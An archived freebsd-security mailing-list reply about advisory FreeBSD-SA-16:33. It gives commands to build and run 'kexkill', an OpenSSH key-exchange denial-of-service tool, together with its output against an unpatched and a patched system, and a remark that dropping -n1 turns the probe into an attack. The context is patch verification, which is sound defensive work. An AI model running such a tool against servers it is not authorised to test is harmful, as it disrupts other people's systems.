Date: Sun, 06 Nov 2016 15:59:38 +0100 From: =?utf-8?Q?Dag-Erling_Sm=C3=B8rgrav?= <des@des.no> To: Xin LI <delphij@gmail.com> Cc: Vladimir Terziev <Vladimir.Terziev@bwinparty.com>, "\<freebsd-security\@freebsd.org\>" <freebsd-security@freebsd.org>, Gregory Orange <gregory.orange@calorieking.com> Subject: Re: FreeBSD Security Advisory FreeBSD-SA-16:33.openssh Message-ID: <86vaw0irhh.fsf@desk.des.no> In-Reply-To: <CAGMYy3t%2B-dZiFEDLEznTFHzHzRnk9-=AyqcqJ7L1BoMQ01HOAg@mail.gmail.com> (Xin LI's message of "Fri, 4 Nov 2016 10:08:05 -0700") References: <20161102075533.8BBA114B5@freefall.freebsd.org> <201611021357.uA2DvHMW003088@higson.cam.lispworks.com> <CA%2B7WWSc%2B_Jjf%2BStVb2n367%2B7YSCw-RnGMTbT4nbaE88d_n57%2Bg@mail.gmail.com> <b8dcb2aa-4149-89ad-e519-8ce68922d0a8@FreeBSD.org> <24ff198d-9bd2-9842-50d8-8a1d5e2ecf8a@FreeBSD.org> <79b7122f-3b1a-377f-42bf-bd2851c5e6ae@calorieking.com> <97DEB29F-E625-4A74-9E1A-BC2A220DCF5A@bwinparty.com> <CAGMYy3t%2B-dZiFEDLEznTFHzHzRnk9-=AyqcqJ7L1BoMQ01HOAg@mail.gmail.com>
next in thread | previous in thread | raw e-mail | index | archive | help
Xin LI <delphij@gmail.com> writes: > We will investigate if the statement is true and will issue patches > for earlier FreeBSD releases, if they are confirmed to be affected. Hoping to make your life a little easier: $ git clone https://github.com/dag-erling/kexkill $ cd kexkill $ ./autogen.sh && ./configure && make vulnerable 12.0 system: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit [no more output] ^C same system after applying SA-16:33: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] write(): Broken pipe kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer [...] ^C Remove -n1 to actually (attempt to) attack the system rather than just probe it. DES --=20 Dag-Erling Sm=C3=B8rgrav - des@des.no
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?86vaw0irhh.fsf>